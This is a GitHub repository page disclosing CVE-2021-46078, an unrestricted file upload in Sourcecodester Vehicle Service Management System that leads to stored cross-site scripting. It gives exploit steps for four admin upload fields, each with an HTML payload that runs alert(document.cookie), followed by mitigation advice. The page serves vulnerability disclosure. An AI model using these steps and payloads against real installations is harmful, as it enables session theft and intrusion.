Skip to content

CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.

plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2021-46078

Exploit Title: Vehicle Service Management System - 'Multiple' File upload Leads to Stored Cross-Site Scripting

Exploit Author: P.L.Sanu

CVE: CVE-2021-46078

CVSS: 4.8 MEDIUM

References:

Description:

An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit:

  1. Login to the admin panel http://localhost/vehicle_service/admin
  2. Navigate to My Account section http://localhost/vehicle_service/admin/?page=user

Payload:

<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Save the above html code For Ex:XSS.html
  2. In My Account Section enter all the required details and browse the html file in Avatar.
  3. Click on update button.
  4. Open the avatar image in new tab.
  5. Malicious javascript code triggered.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit:

  1. Login to the admin panel http://localhost/vehicle_service/admin
  2. Navigate to User List section and click on Create New button.

Payload:

<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Save the above html code For Ex:XSS.html
  2. In Create New User Page enter all the required details and browse the html file in Avatar.
  3. Click on Save button.
  4. Open the avatar image in new tab.
  5. Malicious javascript code triggered.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Exploit:

  1. Login to the admin panel http://localhost/vehicle_service/admin
  2. Navigate to Settings section http://localhost/vehicle_service/admin/?page=system_info

Payload:

<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Save the above html code For Ex:XSS.html
  2. In Settings Section enter all the required details and browse the html file in System Logo.
  3. Click on update button.
  4. Open the System Logo image in new tab.
  5. Malicious javascript code triggered.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Exploit:

  1. Login to the admin panel http://localhost/vehicle_service/admin
  2. Navigate to Settings section http://localhost/vehicle_service/admin/?page=system_info

Payload:

<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Save the above html code For Ex:XSS.html
  2. In Settings Section enter all the required details and browse the html file in Website Cover.
  3. Click on update button.
  4. Open the Website Cover image in new tab.
  5. Malicious javascript code triggered.

Impact:

An attacker can able to upload malicious file in multiple endpoints it leads to Stored Cross-Site Scripting.

Mitigation:

It is recommended to implement the following:

  • Never accept a filename and its extension directly without having a white-list filter.
  • If there is no need to have Unicode characters, it is highly recommended to only accept alpha-numeric characters and only one dot as an input for the file name and the extension.
  • Limit the file size to a maximum value in order to prevent denial of service attacks.
  • Uploaded directory should not have any "execute" permission.
  • Don't rely on client-side validation only.

About

CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published